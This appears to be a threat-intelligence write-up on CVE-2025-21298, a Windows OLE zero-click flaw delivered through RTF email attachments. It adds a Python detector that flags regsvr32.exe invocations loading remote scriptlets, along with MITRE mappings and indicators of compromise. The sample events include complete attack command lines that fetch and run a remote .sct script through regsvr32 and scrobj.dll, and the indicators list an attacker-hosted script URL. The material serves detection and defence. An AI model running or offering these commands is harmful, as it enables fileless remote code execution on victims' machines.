CVE-2025-21298 is a critical zero-click vulnerability in Windows OLE that allows malicious code to execute without any user interaction. It is triggered through OLE objects embedded in RTF files and gives an attacker control of the system, leading to malware installation and data exfiltration.

Affected: Windows OLE, Rich Text Format (RTF) files
Key points:
- Critical zero-click vulnerability in Windows OLE (CVE-2025-21298).
- Exploits memory corruption in the ole32.dll library.
- Triggered by embedding OLE objects in RTF files.
- Enables exploitation through buffer overflow and use-after-free conditions.
- Email received with a malicious attachment flagged by security systems.
- Malware is executed through regsvr32.exe, which loads a script hosted on a remote server.
- Execution relies on scrobj.dll, a fileless technique that leaves no payload on disk.
- Analysis of the embedded objects reveals small payloads, possibly staged for further exploitation.
- The malicious file hash is flagged by 16 security vendors, indicating high risk.
MITRE Techniques:
- T1218: Signed Binary Proxy Execution – regsvr32.exe was used to execute a remote script.
- T1059.004: Command and Scripting Interpreter: Windows Batch – executed commands involved CMD and regsvr32.exe.
- T1071.001: Application Layer Protocol: Web Protocols – utilized HTTP to download a malicious shell script.
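The key points and MITRE mapping above describe the execution chain: regsvr32.exe is launched with an /i: argument pointing at a remote scriptlet, and scrobj.dll handles the script. The following detection routine is an added example written for this page, not code from the original report. It runs over constructed process-creation events (parent process, image, command line) and flags regsvr32.exe invocations that reference a remote URL or scrobj.dll, raising the severity when the parent is an Office application or cmd.exe. The sample events, the 198.51.100.7 address and the field names are assumptions made for the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record, as an EDR or Sysmon event would provide."""
    parent: str
    image: str
    command_line: str


# Constructed sample events; the address 198.51.100.7 is a TEST-NET address, not a real host.
SAMPLE_EVENTS = [
    ProcessEvent("winword.exe", "cmd.exe",
                 "cmd.exe /c regsvr32.exe /s /n /u /i:http://198.51.100.7/shell.sct scrobj.dll"),
    ProcessEvent("cmd.exe", "regsvr32.exe",
                 "regsvr32.exe /s /n /u /i:http://198.51.100.7/shell.sct scrobj.dll"),
    # Benign: a local DLL registered during a software install.
    ProcessEvent("services.exe", "regsvr32.exe",
                 'regsvr32.exe /s "C:\\Program Files\\Vendor\\vendor.dll"'),
    ProcessEvent("explorer.exe", "regsvr32.exe",
                 "regsvr32 /s C:\\Windows\\System32\\msxml3.dll"),
]

# Parents that should rarely spawn regsvr32 with a remote scriptlet.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wordpad.exe", "cmd.exe"}

REGSVR32 = re.compile(r"\bregsvr32(?:\.exe)?\b", re.IGNORECASE)
# /i: followed by an http(s) or ftp URL: the scriptlet is fetched from a remote host (T1218, T1071.001).
REMOTE_SCRIPTLET = re.compile(r"/i:\s*[\"']?((?:https?|ftp)://[^\s\"']+)", re.IGNORECASE)
# scrobj.dll is the scriptlet handler that makes the remote script executable without a file on disk.
SCROBJ = re.compile(r"scrobj\.dll", re.IGNORECASE)


def analyse_event(event: ProcessEvent):
    """Return a finding dict for a suspicious regsvr32 invocation, or None for benign events."""
    cmd = event.command_line
    if not REGSVR32.search(cmd):
        return None

    reasons = []
    url = None
    remote = REMOTE_SCRIPTLET.search(cmd)
    if remote:
        url = remote.group(1)
        reasons.append("regsvr32 /i: references a remote URL (signed binary proxy execution, T1218)")
    if SCROBJ.search(cmd):
        reasons.append("scrobj.dll named on the command line (fileless scriptlet execution)")
    if not reasons:
        # regsvr32 registering a local DLL is routine; nothing to report.
        return None

    if event.parent.lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by suspicious parent process {event.parent}")

    # Two or more independent indicators make the finding high severity.
    severity = "high" if len(reasons) >= 2 else "medium"
    return {
        "image": event.image,
        "parent": event.parent,
        "url": url,
        "severity": severity,
        "reasons": reasons,
    }


def scan(events):
    """Run the detector over a sequence of events and collect the findings."""
    return [f for f in (analyse_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['severity'].upper()}] {finding['parent']} -> {finding['image']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
        if finding["url"]:
            print(f"    url for blocklisting: {finding['url']}")
```

The extracted URL is the value to feed into web-proxy blocking and the IP/URL indicators below; the two benign events show that matching on regsvr32.exe alone would be far too noisy, so the logic keys on the /i: URL and scrobj.dll rather than on the binary name.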
Indicators of Compromise:
- [MD5] 9d68678aeee52684bbe3c983222b1da3 (malicious RTF file hash)
- [MD5] f1d3ff8443297732862df21dc4e57262 (embedded object hash)
- [IPv4] 84.38.130.118 (IP address used to host malicious script)
- [Email] projectmanagement@pm.me (sender of the malicious email)
- [URL] http://84.38.130.118.com/shell.sct (script download URL)